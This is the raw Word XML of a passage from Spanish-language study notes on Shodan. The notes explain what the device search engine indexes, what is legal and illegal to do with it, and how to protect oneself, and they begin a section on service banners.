    <w:p w14:paraId="7CF71CBF" w14:textId="77777777" w:rsidR="00401A0F" w:rsidRDefault="00401A0F" w:rsidP="00590FF7">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F7E3EA" w14:textId="77777777" w:rsidR="00401A0F" w:rsidRDefault="00401A0F" w:rsidP="00590FF7">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA6D4BD" w14:textId="77777777" w:rsidR="00401A0F" w:rsidRDefault="00401A0F" w:rsidP="00590FF7">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="178A28BB" w14:textId="77777777" w:rsidR="00401A0F" w:rsidRPr="00590FF7" w:rsidRDefault="00401A0F" w:rsidP="00590FF7">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C0F01E" w14:textId="5B943F08" w:rsidR="00590FF7" w:rsidRDefault="00590FF7" w:rsidP="00590FF7">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="020CA9FF" w14:textId="6098D05B" w:rsidR="00E24092" w:rsidRPr="00CF52EB" w:rsidRDefault="00E24092" w:rsidP="00E24092">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.4.5 ¿POR QUÉ ES TAN PODEROSO?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D75E811" w14:textId="151D5218" w:rsidR="00417BB5" w:rsidRPr="00401A0F" w:rsidRDefault="00401A0F" w:rsidP="00401A0F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00401A0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0797EBDC" wp14:editId="6E2A3D56">
            <wp:extent cx="4803112" cy="1821180"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1981503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3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417" cy="18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8"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00401A0F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20E310CD" wp14:editId="5E653203">
            <wp:extent cx="4815840" cy="2016410"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3175"/>
            <wp:docPr id="17153380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380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1870" cy="20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FF06" w14:textId="77777777" w:rsidR="0053749D" w:rsidRPr="0053749D" w:rsidRDefault="0053749D" w:rsidP="0053749D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053749D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>INTERFAZ WEB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A04BA2" w14:textId="77777777" w:rsidR="0053749D" w:rsidRPr="0053749D" w:rsidRDefault="0053749D" w:rsidP="0053749D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0053749D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cuando entras a </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="0053749D">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://www.shodan.io</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0053749D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> y buscas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082F18F8" w14:textId="2A6BB11D" w:rsidR="0053749D" w:rsidRDefault="00DE4826" w:rsidP="0053749D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE4826">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00767231" wp14:editId="77BD879D">
            <wp:extent cx="4305300" cy="2759378"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="11801010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010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7876" cy="27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8D98" w14:textId="77777777" w:rsidR="00DE4826" w:rsidRDefault="00DE4826" w:rsidP="00DE4826">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338B97F6" w14:textId="77777777" w:rsidR="00DE4826" w:rsidRDefault="00DE4826" w:rsidP="00DE4826">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A43B0E2" w14:textId="77777777" w:rsidR="00DE4826" w:rsidRDefault="00DE4826" w:rsidP="00DE4826">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BCE6644" w14:textId="77777777" w:rsidR="00DE4826" w:rsidRDefault="00DE4826" w:rsidP="00DE4826">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F389414" w14:textId="77777777" w:rsidR="00DE4826" w:rsidRDefault="00DE4826" w:rsidP="00DE4826">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B49A24" w14:textId="78361E62" w:rsidR="00DE4826" w:rsidRPr="00DE4826" w:rsidRDefault="00DE4826" w:rsidP="00DE4826">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE4826">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LA PARTE ATERRADORA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030414B4" w14:textId="77777777" w:rsidR="00DE4826" w:rsidRPr="00DE4826" w:rsidRDefault="00DE4826" w:rsidP="00DE4826">
      <w:r w:rsidRPr="00DE4826">
        <w:t xml:space="preserve">Shodan NO hackea nada. Solo muestra lo que </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4826">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>YA está público</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE4826">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B96AAF3" w14:textId="0E615281" w:rsidR="001E2EAD" w:rsidRDefault="00931AC4" w:rsidP="00DE4826">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931AC4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46A6E2F9" wp14:editId="2D214421">
            <wp:extent cx="5265420" cy="1757090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="194273614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6147" name="Imagen 1" descr="Texto, Cart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929" cy="17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380F" w14:textId="77777777" w:rsidR="00931AC4" w:rsidRPr="00931AC4" w:rsidRDefault="00931AC4" w:rsidP="00931AC4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931AC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CASOS REALES ENCONTRADOS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB8DDF4" w14:textId="3A5F979B" w:rsidR="00931AC4" w:rsidRDefault="00931AC4" w:rsidP="00DE4826">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931AC4">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0047F346" wp14:editId="762C5C45">
            <wp:extent cx="5311140" cy="1435483"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="21112919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1910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6095" cy="14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C75" w14:textId="77777777" w:rsidR="00931AC4" w:rsidRPr="00931AC4" w:rsidRDefault="00931AC4" w:rsidP="00931AC4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931AC4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CÓMO TE AFECTA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FA39E3" w14:textId="08E03512" w:rsidR="00931AC4" w:rsidRDefault="00967EA0" w:rsidP="00DE4826">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00967EA0">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C60B601" wp14:editId="2E358DF9">
            <wp:extent cx="4122420" cy="1894023"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17937071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71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0976" cy="18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858C" w14:textId="77777777" w:rsidR="003042DF" w:rsidRPr="003042DF" w:rsidRDefault="003042DF" w:rsidP="003042DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003042DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CÓMO PROTEGERTE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BF3D56" w14:textId="0E954B4A" w:rsidR="001E2EAD" w:rsidRDefault="003042DF" w:rsidP="003042DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003042DF">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1075FE59" wp14:editId="7A8445DE">
            <wp:extent cx="4246420" cy="1684020"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="16830712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12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6696" cy="16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2E2B" w14:textId="77777777" w:rsidR="001E2EAD" w:rsidRDefault="001E2EAD" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2440915D" w14:textId="26FFDB68" w:rsidR="00CF52EB" w:rsidRPr="00CF52EB" w:rsidRDefault="00CF52EB" w:rsidP="00CF52EB">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.4.6 En Resumen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC6C7F" w14:textId="3BAD76FC" w:rsidR="001E2EAD" w:rsidRDefault="00CF52EB" w:rsidP="00CF52EB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF52EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shodan es:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0280F30E" w14:textId="14210518" w:rsidR="00CF52EB" w:rsidRDefault="00CF52EB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF52EB">
        <w:t>Motor de búsqueda de dispositivos IoT/servidores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670EAE33" w14:textId="1E1625D7" w:rsidR="00CF52EB" w:rsidRDefault="00CF52EB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Escanea Internet 24/7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D014426" w14:textId="7C10885E" w:rsidR="00CF52EB" w:rsidRDefault="00CF52EB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Indexa TODO lo que responde</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D396439" w14:textId="500555A7" w:rsidR="00CF52EB" w:rsidRDefault="00CF52EB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Muestra configuraciones inseguras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FF7650" w14:textId="18239B18" w:rsidR="00CF52EB" w:rsidRDefault="00CF52EB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Herramienta LEGAL (solo lee lo publico)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E68019" w14:textId="77777777" w:rsidR="00FA6BA0" w:rsidRDefault="00FA6BA0" w:rsidP="00FA6BA0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NO es:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC714FA" w14:textId="77777777" w:rsidR="00FA6BA0" w:rsidRPr="00FA6BA0" w:rsidRDefault="00FA6BA0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6BA0">
        <w:t xml:space="preserve">Una herramienta de hacking </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB11A30" w14:textId="77777777" w:rsidR="00FA6BA0" w:rsidRPr="00FA6BA0" w:rsidRDefault="00FA6BA0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6BA0">
        <w:t xml:space="preserve">Ilegal de usar </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4057FC" w14:textId="72623C52" w:rsidR="00FA6BA0" w:rsidRPr="00FA6BA0" w:rsidRDefault="00FA6BA0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6BA0">
        <w:t>Un exploit automático</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F698C6" w14:textId="23FE3CEB" w:rsidR="00FA6BA0" w:rsidRDefault="00FA6BA0" w:rsidP="00FA6BA0">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA6BA0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.4.7 LEGALIDAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7430C6E4" w14:textId="1D333F20" w:rsidR="00FA6BA0" w:rsidRDefault="00FA6BA0" w:rsidP="00FA6BA0">
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Legal: </w:t>
      </w:r>
      <w:r>
        <w:t>Buscar en Shodan</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Legal: </w:t>
      </w:r>
      <w:r>
        <w:t>Ver información publica</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ilegal: </w:t>
      </w:r>
      <w:r>
        <w:t>Acceder a dispositivos sin permisos</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ilegal: </w:t>
      </w:r>
      <w:r>
        <w:t>Usar passwords encontrados</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ilegal: </w:t>
      </w:r>
      <w:r>
        <w:t>Explotar vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B286EE" w14:textId="77777777" w:rsidR="00FA6BA0" w:rsidRPr="00FA6BA0" w:rsidRDefault="00FA6BA0" w:rsidP="00FA6BA0"/>
    <w:p w14:paraId="255D0422" w14:textId="26189BA5" w:rsidR="001E2EAD" w:rsidRPr="000951E1" w:rsidRDefault="000951E1" w:rsidP="00FA6BA0">
      <w:r w:rsidRPr="000951E1">
        <w:t>Shodan es el "buscador del Internet de las Cosas" que expone lo mal configurado que está el mundo digital. Es simultáneamente una herramienta de seguridad invaluable y un recordatorio aterrador de cuán inseguro está todo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1661EFEB" w14:textId="77777777" w:rsidR="001E2EAD" w:rsidRDefault="001E2EAD" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C44233" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC76C2A" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDEA442" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8825CF" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B09BB6E" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5852D6" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3B9B3D" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721CCBA6" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6310B8D7" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B852F5" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CE594B" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12756D64" w14:textId="77777777" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00960D31">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45ABD388" w14:textId="14A506F1" w:rsidR="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00C73FD2">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73FD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.4.8 BANNER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC761C" w14:textId="622C1532" w:rsidR="00C73FD2" w:rsidRPr="00C73FD2" w:rsidRDefault="00C73FD2" w:rsidP="00C73FD2">
      <w:r w:rsidRPr="00C73FD2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Banner = </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73FD2">
        <w:t>Mensaje de identificación que un servicio envía cuando te conectas a el.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2EF9AA" w14:textId="77777777" w:rsidR="00954398" w:rsidRPr="00954398" w:rsidRDefault="00954398" w:rsidP="00954398">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00954398">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo práctico:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CBAD6A" w14:textId="77777777" w:rsidR="00954398" w:rsidRPr="00954398" w:rsidRDefault="00954398" w:rsidP="00954398">
      <w:r w:rsidRPr="00954398">
        <w:t>Cuando te conectas al puerto 22 (SSH) de un servid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4398" w14:paraId="61BE12CC" w14:textId="77777777" w:rsidTr="00954398">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04FE06D4" w14:textId="77777777" w:rsidR="00954398" w:rsidRPr="00954398" w:rsidRDefault="00954398" w:rsidP="00954398">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00954398">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>Te conectas → 200.1.1.1:22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2058AEBC" w14:textId="77777777" w:rsidR="00954398" w:rsidRPr="00954398" w:rsidRDefault="00954398" w:rsidP="00954398">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05343339" w14:textId="77777777" w:rsidR="00954398" w:rsidRPr="00954398" w:rsidRDefault="00954398" w:rsidP="00954398">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00954398">
              <w:rPr>
                <w:rFonts w:cs="Arial"/>
              </w:rPr>
              <w:t>El servidor responde:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AF9F1CC" w14:textId="3E9DCBC7" w:rsidR="00954398" w:rsidRDefault="00954398" w:rsidP="00954398">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
